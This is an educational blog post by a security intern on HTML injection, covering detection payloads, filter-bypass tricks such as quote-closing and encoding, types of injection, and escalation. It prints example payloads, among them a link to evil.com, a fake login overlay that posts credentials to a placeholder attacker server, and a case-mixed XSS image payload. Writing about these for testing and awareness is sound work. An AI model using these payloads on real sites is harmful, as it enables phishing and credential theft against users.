Research on HTML Injection

3 min readJan 8, 2022

Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly given some interesting tasks, In my nineth task I was given to research about HTML Injection Vulnerability and write a report about it.

What is HTML Injection?

HTML Injection also termed as “virtual defacements” is one of the most simple and the most common vulnerability that arises when the web-page fails to sanitize the user-supplied input or validates the output, which thus allows the attacker to craft his payloads and injects the malicious HTML codes into the application through the vulnerable fields, such that he can modify the webpage content and even grabs up some sensitive data.

When an application does not properly handle user supplied data, an attacker can supply valid HTML code, typically via a parameter value, and inject their own content into the page. This attack is typically used in conjunction with some form of social engineering, as the attack is exploiting a code-based vulnerability and a user’s trust.

Latest HTML version is HTML 5.

How to Detect HTML Injection?

You can detect HTML injection via first finding parameters and endpoint taking user input and reflecting it back on the client side. Also the injection point can be at one place and the place it is reflecting back can be at another place so remember to look thoroughly.

Following payloads can be used to find it:

1. <h1>SAPT</h1> and <h6>SAPT</h6> and compare them

2. <img src=img_url> Check if given image is injected

3. <a href=https://evil.com>ClickHere</a> Check if link in injected.

By trying this you can definitely be blocked or filter techniques would be there, so should you give up? No, we also have some methods to bypass these features.

1. My favourite technique for manual hunting of this is “Query Balancing” , it is applicable on XSS too, not only HTML Injection.

For your input (idnf) if there is a following HTML Source:

In such cases to escape value tag you have to start your payload with “>

What happens? Here it actually closes the input area before our payload, so our input won’t be stored in the “value” parameter and it will act as an open string. So if the web application firewall is checking the content of the value parameter only then there won’t be anything suspicious and the request will pass, but the rest of the payload will stay in the web application and it will consider that as a part of code and will be executed. Hence Bypassed.

2. You can also use encodings on your payload and inject them to bypass it, like base64 encoding or URL encoding. It sometimes bypasses the filters.

What are the Different Types of HTML Injection?

1. Reflected HTML Injection

When you inject an HTML payload and then an only then it is shown at that moment and as soon as it reloads the injection goes away. It is generally on GET parameters and sometimes on POST parameters too.

2. Stored HTML Injection

When you inject an HTML payload and it stays there until the change, even if you log out your account and come back, hence it is stored.

3. Email HTML Injection

When the content of emails coming in your mail box is injected with HTML Payloads it is known as Email HTML Injection. This is P4 according to Bugcrowd VRT.

What are the Exploit Scenarios / Escalation For HTML Injection?

1. The most basic exploit is to use HTML injection as a medium for social engineering. It can be done by injecting a link

<a href=https://evil.com>ClickHere for Rewards</a>

Or by Injecting a complete form

<div style=”position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index:1000; background-color:white; padding:1em;”>Please login with valid

credenitals:<br><form name=”login” action=”http://YOURSERVER/login.htm">

<table><tr><td>Username:</td><td><input type=”text” name=”username”/></td></tr><tr><td>Password:</td>

</table></form>

2. It can also be escalated to XSS with the help of HTML Injection which is pretty common. Eg payload <IMG SRC=JaVaScRiPt:alert(‘XSS’)> can be used for this.